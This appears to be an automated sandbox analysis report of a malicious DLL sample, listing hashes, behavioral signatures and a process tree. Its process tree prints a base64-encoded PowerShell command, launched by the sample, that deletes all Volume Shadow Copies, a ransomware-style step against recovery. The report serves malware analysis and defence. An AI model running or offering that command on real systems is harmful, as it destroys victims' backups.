Analysis
-
max time kernel
15s -
max time network
124s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
04-06-2021 11:27
Static task
static1
Behavioral task
behavioral1
Sample
38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll
Resource
win7v20210408
Behavioral task
behavioral2
Sample
38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll
Resource
win10v20210410
General
-
Target
38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll
-
Size
164KB
-
MD5
2756f86ef462729bd072ef2d05f00f54
-
SHA1
b074e97c19bc69d39c235c763675b492e2e216f1
-
SHA256
38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6
-
SHA512
9c6a618870ebb1a50bd647f26327d4ab25905c8d438e1f71be87f343e91d58c0e4683afeefc7f725b091cb1a47b5e7fa30d99402fb4296a88e8a5b138ef62d14
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\U: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
rundll32.exepowershell.exepid process 3908 rundll32.exe 3908 rundll32.exe 4032 powershell.exe 4032 powershell.exe 4032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3908 rundll32.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeBackupPrivilege 2160 vssvc.exe Token: SeRestorePrivilege 2160 vssvc.exe Token: SeAuditPrivilege 2160 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 3016 wrote to memory of 3908 3016 rundll32.exe rundll32.exe PID 3016 wrote to memory of 3908 3016 rundll32.exe rundll32.exe PID 3016 wrote to memory of 3908 3016 rundll32.exe rundll32.exe PID 3908 wrote to memory of 4032 3908 rundll32.exe powershell.exe PID 3908 wrote to memory of 4032 3908 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:4052
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3908-114-0x0000000000000000-mapping.dmp
-
memory/4032-115-0x0000000000000000-mapping.dmp
-
memory/4032-121-0x0000026F72010000-0x0000026F72011000-memory.dmpFilesize
4KB
-
memory/4032-126-0x0000026F721C0000-0x0000026F721C1000-memory.dmpFilesize
4KB
-
memory/4032-127-0x0000026F70030000-0x0000026F70032000-memory.dmpFilesize
8KB
-
memory/4032-128-0x0000026F70033000-0x0000026F70035000-memory.dmpFilesize
8KB
-
memory/4032-138-0x0000026F70036000-0x0000026F70038000-memory.dmpFilesize
8KB